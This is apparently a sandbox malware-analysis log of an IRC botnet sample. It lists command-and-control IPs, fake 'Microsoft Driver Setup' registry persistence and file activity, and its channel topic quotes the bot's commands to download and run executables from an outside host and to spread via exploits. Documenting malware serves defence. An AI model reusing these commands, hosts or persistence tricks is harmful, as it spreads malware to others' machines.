www.MSNAREA.COM – Inside Your Botnet

www.MSNAREA.COM 173.208.34.249
membres.lycos.fr
membres.lycos.fr 213.131.252.251
membres.multimania.fr
membres.multimania.fr 213.131.252.251
Download URLs
http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr)
http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr)
http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr)
http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr)
http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr)
http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr)
http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr)
http://213.131.252.251/proxyworld/azenv.php (membres.lycos.fr)

C&C Server: 173.208.34.249:80
Server Password:
Username: SP3-943
Nickname: [N00_DEU_XP_7839707]_CHAR(0x08)_ë@
Channel: (Password: )
Channeltopic:
C&C Server: 173.208.34.249:81
Server Password:
Username: SP3-720
Nickname: [00_DEU_XP_4068211]
Channel: #xx32 (Password: )
Channeltopic: :.asc -S -s |.http http://94.76.194.116/32.exe |.asc exp_all 10 5 0 -c -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 5 5 0 -c |.down -S |.down http://94.76.194.116/brown1.jpg c:f4j7y7b7m9p4.exe c:f4j7y7b7m9p4.exe -r -h
Outgoing connection to remote server: membres.lycos.fr TCP port 80
Outgoing connection to remote server: membres.lycos.fr TCP port 80
Outgoing connection to remote server: membres.lycos.fr TCP port 80
Outgoing connection to remote server: membres.lycos.fr TCP port 80
Outgoing connection to remote server: membres.lycos.fr TCP port 80
Outgoing connection to remote server: membres.lycos.fr TCP port 80

Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Microsoft Driver Setup” = C:DOKUME~1ADMINI~1LOKALE~1Tempxfgnp.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun “Microsoft Driver Setup” = C:DOKUME~1ADMINI~1LOKALE~1Tempxfgnp.exe
Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile “EnableFirewall”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “10”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSecurityProviders “SecurityProviders”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “TokenSize”

File Changes by all processes
New Files DeviceTcp
DeviceIp
DeviceIp
C:DOKUME~1ADMINI~1LOKALE~1Tempxfgnp.exe
DeviceTcp
DeviceIp
DeviceIp
C:DOKUME~1ADMINI~1LOKALE~1Tempxfgnp.exe
DeviceRasAcd
C:Windowslogfile32.txt
Opened Files .PIPElsarpc
c:71a95d2e81c84b3560ce0714195cc635
.Ip
C:WINDOWSRegistrationR000000000007.clb
.PIPElsarpc
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:DOKUME~1ADMINI~1LOKALE~1Temp
.PIPElsarpc
C:DOKUME~1ADMINI~1LOKALE~1Tempxfgnp.exe
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:DOKUME~1ADMINI~1LOKALE~1Temp
.Ip
C:Windowslogfile32.txt
.PIPEROUTER
.PIPElsarpc
c:autoexec.bat
Deleted Files
Chronological Order Get File Attributes: C:WINDOWS Flags: (SECURITY_ANONYMOUS)
Open File: .PIPElsarpc (OPEN_EXISTING)
Get File Attributes: C:Dokumente und EinstellungenAdministratorAnwendungsdatendesktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: c:71a95d2e81c84b3560ce0714195cc635 (OPEN_EXISTING)
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Get File Attributes: C:DOKUME~1ADMINI~1LOKALE~1Tempxfgnp.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:71a95d2e81c84b3560ce0714195cc635 to C:DOKUME~1ADMINI~1LOKALE~1Tempxfgnp.exe
Set File Attributes: C:DOKUME~1ADMINI~1LOKALE~1Tempxfgnp.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Get File Attributes: C:WINDOWSRegistration Flags: (SECURITY_ANONYMOUS)
Open File: C:WINDOWSRegistrationR000000000007.clb (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:DOKUME~1ADMINI~1LOKALE~1Temp ()
Find File: C:DOKUME~1ADMINI~1LOKALE~1Tempxfgnp.exe
Get File Attributes: C:WINDOWS Flags: (SECURITY_ANONYMOUS)
Open File: .PIPElsarpc (OPEN_EXISTING)
Get File Attributes: C:Dokumente und EinstellungenAdministratorAnwendungsdatendesktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: C:DOKUME~1ADMINI~1LOKALE~1Tempxfgnp.exe (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:DOKUME~1ADMINI~1LOKALE~1Temp ()
Find File: C:DOKUME~1ADMINI~1LOKALE~1Tempxfgnp.exe
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Get File Attributes: C:DOKUME~1ADMINI~1LOKALE~1Tempxfgnp.exe Flags: (SECURITY_ANONYMOUS)
Set File Attributes: C:DOKUME~1ADMINI~1LOKALE~1Tempxfgnp.exe Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Copy File: C:DOKUME~1ADMINI~1LOKALE~1Tempxfgnp.exe to C:DOKUME~1ADMINI~1LOKALE~1Tempxfgnp.exe
Set File Attributes: C:DOKUME~1ADMINI~1LOKALE~1Tempxfgnp.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Create/Open File: DeviceRasAcd (OPEN_ALWAYS)
Open File: C:Windowslogfile32.txt (OPEN_EXISTING)
Create File: C:Windowslogfile32.txt
Open File: .PIPEROUTER (OPEN_EXISTING)
Open File: .PIPElsarpc (OPEN_EXISTING)
Get File Attributes: c:autoexec.bat Flags: (SECURITY_ANONYMOUS)
Open File: c:autoexec.bat (OPEN_EXISTING)
Find File: C:Dokumente und EinstellungenAll UsersAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk
Find File: C:WINDOWSsystem32Ras*.pbk
Find File: C:Dokumente und EinstellungenAdministratorAnwendungsdatenMicrosoftNetworkConnectionsPbk*.pbk